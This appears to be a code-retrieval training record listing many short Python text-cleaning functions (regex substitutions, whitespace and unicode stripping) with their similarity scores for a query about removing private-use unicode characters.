+ \"\\n\"\n\n # make sure the \"#\" isn't in quotes\n if temp.count(\"\\\"\") % 2 == 0:\n line = temp\n\n line = line.replace(\"}\", \" } \").replace(\"{\", \" { \")\n while \"=\" in line:\n line = self.replace_equals(line)\n line = line.lstrip()\n return line", "def remove_space(line):\n split_line = line.split()\n return \"\".join(split_line)", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is 
True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def squash_crs(string):\n if isinstance(string, str):\n return re.sub('\\n[^\\n]+\\r', '\\n', string)\n else:\n return re.sub(b'\\n[^\\n]+\\r', b'\\n', string)", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def __stripEol(self, txt):\n return txt.replace(\"\\r\", \"\").replace(\"\\n\", \"\")", "def _chop_end_codes(line):\n return re.sub(r\"\\s\\s\\s\\s+[\\w]{4}.\\s+\\d*\\Z\", \"\", line)", "def clean_smile(self, smi):\n smi = smi.replace('\\n', '')\n return smi", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def unlines(line):\n\n return line.translate(str.maketrans('\\n', ' '))", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def strip_other_charcter():\n pass", "def process_line(line:str) -> str:\n s = replace_multispace(replace_newlines(line))\n return s", "def __cleanText(self,stripNonAlphaNumeric=False, stripNumbers=False):\n if stripNonAlphaNumeric:\n txt = r1.sub(\" \",self.getRawText() )\n else:\n txt = self.getRawText()\n # clean up white spaces\n txt = r2.sub(\" \",txt)\n if stripNumbers:\n txt = r3.sub(\"\",txt)\n self.graph[\"__txt\"] = txt\n self.graph[\"__scope\"] = (0,len(txt))", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def replace_spaces_with_pluses(self, sample):\r\n changed = list(sample)\r\n for i, c in enumerate(changed):\r\n if(c == ' ' or c ==' ' or c ==' ' or c=='\\n' or c=='\\n\\n'):\r\n changed[i] = '+'\r\n return ''.join(changed)", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def cleaning(string):\n\n if type(string) == float or type(string) == int:\n 
return string\n res = ''\n if string != string:\n return string\n string = string.replace(\"\\\\r\", \"\")\n string = string.replace(\"\\\\n\", \"\")\n string = string.replace(\"\\\\b\", \"\")\n string = string.replace(\"\\\\t\", \"\")\n for i in string:\n if i.isalpha():\n res = res + i\n return res.lower()", "def f_shp(i):\n return i.replace('(', '').replace(')', '').replace(', ', 'x').replace(',', '')", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def test__clean_line():\n LINES = {\n \"One morn before me were three figures seen,\":\n \"One morn before me were three figures seen,\",\n \"And once—more came they by:-alas! wherefore?\":\n \"And once more came they by: alas! wherefore?\",\n }\n for line, clean_line in LINES.items():\n assert(LineBuilder(line)._clean_line() == clean_line)", "def strip_rule(line):\n\n return \" \".join(line.split())", "def strip_space():\n pass", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def fix_ending(x):\n x = strip_stoich_wrapper(x)\n x = re.sub(r'(?<=[a-zA-Z])\\-(?=[a-zA-Z]$)', ' ', x)\n return x", "def _clean(self, string):\n return re.sub('\\s+', ' ', string).strip()", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def clean_line(line: str) -> str:\n tokens = re.sub('[^a-z0-9 ]+', ' ', line.lower()).split(' ')\n stemmed_tokens = [w for w in tokens if len(w) > 2]\n return ' '.join(stemmed_tokens)", "def removeApostrophesLine(self, wordLines):\n\t\treturn self._doPerLine(wordLines, self.removeApostrophes)", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def CleanLineEndings(aLine):\n str = aLine.replace(cr, \"\") # remove cr\n str = str.replace(lf, \"\") # remove lf\n return str", "def preprocess(x):\n\n\tres = re.sub(r'[^\\w\\s]', '', x)\n\tres = res.strip('\\n')\n\n\treturn res", "def replace_id_with_symbol(self, line):\n new_line = self._pattern.sub(lambda x: self._mapping[x.group()], line)\n if line != new_line:\n self._set_leading_whitespace(new_line)\n line = self._check_line_length(new_line)\n self._reset_leading_whitespace()\n\n return line", "def normalizeVerseBreak(string):\n string = string.strip()\n string = re.sub('\\s+/\\s?', '/', string)\n string = string.replace('/', ' / ')\n return string", "def _get_whitespace(line):\n return line[:-len(line.lstrip())]", "def remove_linebreaks(self, text):\n return re.sub(ur\"\\n(?!(\"\n u\"DZIAŁ [IVXLC]|\"\n u\"Rozdział [IVXLC1-9]|\"\n u\"Art\\.|\"\n u\"§ \\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\)|\"\n u\"[a-z]+\\)|\"\n u\"–))\", \" \", text)", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = 
tweet.replace('_', ' ')\n return tweet", "def scratch(line):\n if line.count('~~') >= 2:\n for i in range(0, line.count('~~') - line.count('~~') % 2):\n if i % 2 == 0:\n line = line.replace('~~', '<del>', 1)\n else:\n line = line.replace('~~', '</del>', 1)\n return line", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def small_preprocess_singlerow(data):\r\n # Remove new line characters\r\n data = re.sub('\\s+', ' ', data) \r\n # Remove distracting single quotes\r\n data = re.sub(\"\\'\", \"\", data)\r\n\r\n return data", "def clear_line(string):\n for character in string:\n #backtrack-whitespace-backtrack\n sys.stdout.write(\"\\b \\b\")", "def pre_process_line(self, line):\n\n line = line.lower()\n line = line.translate(co.NORM_TABLE)\n line = line.translate(co.PUNC_TABLE)\n line = line.split()\n line = line[self.configs[\"resources\"][self.resource_type][\"lstrip\"]:]\n if self.configs[\"resources\"][self.resource_type][\"rstrip\"]:\n line = line[:-self.configs[\"resources\"][self.resource_type][\"rstrip\"]]\n return \" \".join(line)", "def remove_nonspacing_marks(string):\n return ''.join(c for c in unicodedata.normalize('NFKD', string) if unicodedata.category(c) !='Mn')", "def sanitize_spacers(\n raw_signal_array,\n set_of_spacer_marks\n ):\n # Force spacer marks\n for spacer_index in set_of_spacer_marks:\n raw_signal_array[spacer_index] = '|';\n return raw_signal_array", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text", "def _removeWhitespaces(self, s):\n return s.translate({ord(c): None for c in string.whitespace})", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def del_whitespace(selfs, text):\n\t\treturn text.replace(' ', '')", "def process_line(line_str):\n punctuation = [',', ':', ')']\n for mark in punctuation:\n line_str = line_str.replace(mark, ' ')\n line_str = line_str.replace('(', '')\n line_str = line_str.replace('III', '3').replace('II', '2').replace(' I ', '1')\n words = [w for w in line_str.split(' ') if w != '']\n return words", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def RemoveNonUtf8BadChars(line):\n return \"\".join([ch for ch in line if ch in printable])", "def lowerPen(gcode):\r\n gcode.append(\"M300 S43\")\r\n #gcode.append(\"G0 Z0\")\r", "def formClean(s):\n s = s.replace('\"',\"'\")\n s = s.replace(\"\\n\",\" \")\n return s", "def clean_text_for_skill_extraction(text):\n multi_space_regex = 
re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence", "def squeeze(value):\r\n return re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def fixtags(self, text):\n # french spaces, last one Guillemet-left\n # only if there is something before the space\n text = _guillemetLeftPat.sub(ur'\\1&nbsp;\\2', text)\n # french spaces, Guillemet-right\n text = _guillemetRightPat.sub(ur'\\1&nbsp;', text)\n return text", "def clean_text(some_text):\n # import re\n some_clean_text = re.sub(r'\\n|\\t', '', some_text) # Remove new line and tabs\n some_clean_text = re.sub(' +', ' ', some_clean_text) # Replace multiple spaces with one space\n return some_clean_text", "def remove_punct(self,text):", "def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_chunk(chunk):\n return '\\n'.join([x[1:] for x in chunk.split('\\n')\n if x and x[0] not in ('-', '@')])", "def cleanText(self, stripNonAlphaNumeric=False, stripNumod_byers=False):\n if stripNonAlphaNumeric:\n txt = REG_CLEAN1.sub(\" \", self.getRawText())\n else:\n txt = self.getRawText()\n\n # clean up white spaces\n txt = REG_CLEAN2.sub(\" \", txt)\n if stripNumod_byers:\n txt = REG_CLEAN3.sub(\"\", txt)\n\n self.graph[\"__scope\"] = (0, len(txt))\n self.graph[\"__txt\"] = txt\n if self.getVerbose():\n print(\"cleaned text is now\", self.getText())", "def _remove_extra_whitespaces(self, text: str) -> str:\n return re.sub(\" +\", \" \", text)", "def sanitise(text: str):\n # Removes new lines, weird characters and dialogue\n text = \" \" + text + \" \"\n\n lined_text = text.split(\"\\n\")\n text = \"\"\n # Remove dialogue\n for line in lined_text:\n if \":\" in line:\n if line.index(\":\") < 15:\n index = line.index(\":\") + 1\n else:\n index = 0\n else:\n index = 0\n text = text + \"\\n\" + line[index:]\n\n # Lower case 
everything\n text = text.lower()\n\n text = text.replace(\"'s\", \" is\")\n text = text.replace(\"'ve\", \" have\")\n text = text.replace(\"n't\", \" not\")\n text = text.replace(\"I'm\", \"I am\")\n text = text.replace(\"'re\", \" are\")\n text = text.replace(\"’s\", \" is\")\n text = text.replace(\"’ve\", \" have\")\n text = text.replace(\"n’t\", \" not\")\n text = text.replace(\"I’m\", \"I am\")\n text = text.replace(\"’re\", \" are\")\n\n # Remove weird characters and double spaces\n weird_characters = [\".\", \",\", \"?\", \"!\", \"'\", \"’\", \"\\\"\", \"\\n\", \"\\t\", \"-\", \"/\", \"[\", \"]\", \"(\", \")\", \":\", \"“\", \"”\"]\n for weird_character in weird_characters:\n text = text.replace(weird_character, \" \")\n\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n return text", "def fix_missing_period(line):\n if \"@highlight\" in line:\n return line\n if line == \"\":\n return line\n if line[-1] in END_TOKENS:\n return line\n return line + \" .\"", "def fix_horizontal(line):\n\tline = line.rstrip()\n\tline = untabify(line, tab_width)\n\treturn line + '\\n'", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n string = string.strip(\"\\n\")\n return string", "def cleantxt(text):\n return ((text.replace(',', '')).replace('/', ' ')).replace('-', ' ')", "def normalize(self, what):\n txt = strippedtxt(what, [\"\\002\", \"\\003\"])\n txt = re.sub(\"\\s+\", \" \", what)\n txt = stripcolor(txt)\n txt = txt.replace(\"\\002\", \"*\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n txt = txt.replace(\"&lt;b&gt;\", \"*\")\n txt = txt.replace(\"&lt;/b&gt;\", \"*\")\n txt = txt.replace(\"&lt;i&gt;\", \"\")\n txt = txt.replace(\"&lt;/i&gt;\", \"\")\n return txt", "def clean_emojis_and_smileys(self, tweet):\n smileys = re.findall(self.pattern1, tweet)\n\n for smiley in smileys:\n tweet = tweet.replace(smiley, '')\n\n try:\n highpoints = re.compile(u'[\\U00010000-\\U0010ffff]')\n\n except re.error:\n # UCS-2 build\n highpoints = re.compile(u'[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]')\n\n tweet = highpoints.sub(u'', tweet)\n\n tweet = self.clean_unnecessary_whitespaces(tweet)\n return tweet", "def ungapped(self):\n s = self.sequence\n for sGapChar in GAP_CHARACTERS:\n s = s.replace(sGapChar, '')\n return s", "def remove_at_symbols(text):\n return text.replace('@', '')", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def process(self,line):\n\n pattern = re.compile(\"@.*?@\")\n matches = pattern.findall(line)\n for m in matches:\n replacement = r\"<small>{}</small>\".format(re.escape(m[1:-1]))\n line = pattern.sub(replacement,line)\n\n return line", "def clean_str_sst(string):\n string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\n string = re.sub(r\"\\s{2,}\", \" \", string)\n return string.strip().lower()", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove 
new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def strip_line(line):\n line = line.strip()\n line = line.rstrip('\\n')\n line = line.rstrip('\\t')\n line = (line.split(\"//\"))[0]\n return line" ]
[ "0.6750238", "0.6354936", "0.60908276", "0.60867965", "0.6052043", "0.5917007", "0.58838075", "0.58618855", "0.5852398", "0.58450764", "0.5843433", "0.584121", "0.5809004", "0.5809004", "0.5773769", "0.5744268", "0.573116", "0.57237", "0.56972486", "0.5695229", "0.5684892", "0.5674085", "0.56583124", "0.5650387", "0.559185", "0.55685383", "0.5549865", "0.55386126", "0.55377525", "0.5536837", "0.55340606", "0.55254143", "0.55119115", "0.54688764", "0.54623795", "0.54562795", "0.5443397", "0.54376656", "0.5435009", "0.5434793", "0.5426704", "0.54233366", "0.5421047", "0.54106575", "0.53893983", "0.5376921", "0.5367417", "0.536653", "0.5356102", "0.5350136", "0.53461236", "0.53430325", "0.5335932", "0.53352904", "0.53330046", "0.5332036", "0.5325575", "0.53173435", "0.5303478", "0.5301209", "0.52968335", "0.52859926", "0.528207", "0.5272832", "0.52716386", "0.52639437", "0.526229", "0.5259219", "0.525423", "0.52430683", "0.5242863", "0.5238737", "0.52370006", "0.52358514", "0.5207327", "0.52034724", "0.52010167", "0.5197277", "0.5184585", "0.5184585", "0.5180996", "0.5172558", "0.5162926", "0.51590055", "0.51559263", "0.51549375", "0.51537883", "0.51531625", "0.51531047", "0.5151625", "0.51491195", "0.5144987", "0.51435286", "0.5142994", "0.51415694", "0.51393723", "0.5131517", "0.5128602", "0.5126882" ]
0.8284751
1
Cleans the line from private unicode characters and replaces these with space.
def clean_text_from_private_unicode(line): line = re.sub(r"([\uE000-\uF8FF]|\uD83C[\uDF00-\uDFFF]|\uD83D[\uDC00-\uDDFF])", " ", line) return line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def RemoveNonUtf8BadChars(line):\n return \"\".join([ch for ch in line if ch in printable])", "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def prepare_text_line(line):\n\n re_sub = re.sub\n # FIXME: maintain the original character positions\n\n # strip whitespace\n line = line.strip()\n\n # strip comment markers\n # common comment characters\n line = line.strip('\\\\/*#%;')\n # un common comment line prefix in dos\n line = re_sub('^rem\\s+', ' ', line)\n line = re_sub('^\\@rem\\s+', ' ', line)\n # un common comment line prefix in autotools am/in\n line = re_sub('^dnl\\s+', ' ', line)\n # un common comment line prefix in man pages\n line = re_sub('^\\.\\\\\\\\\"', ' ', line)\n # un common pipe chars in some ascii art\n line = line.replace('|', ' ')\n\n # normalize copyright signs and spacing aournd them\n line = line.replace('(C)', ' (c) ')\n line = line.replace('(c)', ' (c) ')\n # the case of \\251 is tested by 'weirdencoding.h'\n line = line.replace(u'\\251', u' (c) ')\n line = line.replace('&copy;', ' (c) ')\n line = line.replace('&#169;', ' (c) ')\n line = line.replace('&#xa9;', ' (c) ')\n line = line.replace(u'\\xa9', ' (c) ')\n # FIXME: what is \\xc2???\n line = line.replace(u'\\xc2', '')\n\n # TODO: add more HTML entities replacements\n # see http://www.htmlhelp.com/reference/html40/entities/special.html\n # convert html entities &#13;&#10; CR LF to space\n line = line.replace(u'&#13;&#10;', ' ')\n line = line.replace(u'&#13;', ' ')\n line = line.replace(u'&#10;', ' ')\n\n # normalize (possibly repeated) quotes to unique single quote '\n # backticks ` and \"\n line = line.replace(u'`', \"'\")\n line = line.replace(u'\"', \"'\")\n line = re.sub(MULTIQUOTES_RE(), \"'\", line)\n # quotes to space? but t'so will be wrecked\n # line = line.replace(u\"'\", ' ')\n\n # some trailing garbage ')\n line = line.replace(\"')\", ' ')\n\n\n # note that we do not replace the debian tag by a space: we remove it\n line = re_sub(DEBIAN_COPYRIGHT_TAGS_RE(), '', line)\n\n line = re_sub(IGNORED_PUNCTUATION_RE(), ' ', line)\n\n # tabs to spaces\n line = line.replace('\\t', ' ')\n\n # normalize spaces around commas\n line = line.replace(' , ', ', ')\n\n # remove ASCII \"line decorations\"\n # such as in --- or === or !!! 
or *****\n line = re_sub(ASCII_LINE_DECO_RE(), ' ', line)\n line = re_sub(ASCII_LINE_DECO2_RE(), ' ', line)\n\n # Replace escaped literal \\0 \\n \\r \\t that may exist as-is by a space\n # such as in code literals: a=\"\\\\n some text\"\n line = line.replace('\\\\r', ' ')\n line = line.replace('\\\\n', ' ')\n line = line.replace('\\\\t', ' ')\n line = line.replace('\\\\0', ' ')\n\n # TODO: Why?\n # replace contiguous spaces with only one occurrence\n # line = re.sub(WHITESPACE_RE(), ' ', text)\n\n # normalize to ascii text\n line = commoncode.text.toascii(line)\n # logger.debug(\"ascii_only_text: \" + text)\n\n # strip verbatim back slash and comment signs again at both ends of a line\n # FIXME: this is done at the start of this function already\n line = line.strip('\\\\/*#%;')\n\n # normalize to use only LF as line endings so we can split correctly\n # and keep line endings\n line = commoncode.text.unixlinesep(line)\n # why?\n line = lowercase_well_known_word(line)\n\n return line", "def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def unlines(line):\n\n return line.translate(str.maketrans('\\n', ' '))", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def strip_other_charcter():\n pass", "def quote( self, aLine ):\n clean= aLine\n for from_, to_ in self.quoted_chars:\n clean= clean.replace( from_, to_ )\n return clean", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if 
_is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet", "def cleaning_up(self):\n # find all non-letter-no-digit except whitespace and \"-\"\n try:\n pattern = re.compile(\"[a-zA-Z0-9\\\\s\\\\-]\")\n badChars = re.sub(pattern, '', string.printable)\n logging.debug(\"Bad chars: {}\".format(badChars))\n # define translate table\n remap = dict.fromkeys(badChars)\n logging.debug(remap)\n table = str.maketrans(remap)\n result = \"\"\n with open(self.input) as infile:\n lines = (line.strip() for line in infile)\n for line in lines:\n if len(line) == 0:\n continue\n else:\n logging.debug(line)\n result = result + \" \" + line.translate(table)\n # Since the input file only has one line, we can use the following\n # code. For general use, I kept above code.\n # result = line.translate(remap)\n # break;\n except LookupError as e:\n logging.exception(\"Lookup Error: {}\".format(e.strerror))\n except IOError as e:\n logging.exception(\"IO Error: {}\".format(e.strerror))\n except:\n logging.exception(\"Unknown Error\")\n return result.strip()", "def sanitize_characters(raw_input_file, clean_output_file):\n input_file = codecs.open(raw_input_file, 'r', encoding='ascii', errors='ignore')\n output_file = open(clean_output_file, 'w', encoding='ascii', errors='ignore')\n\n for line in input_file:\n # removes extra newline\n line = line.rstrip('\\n')\n output_file.write(line)", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = 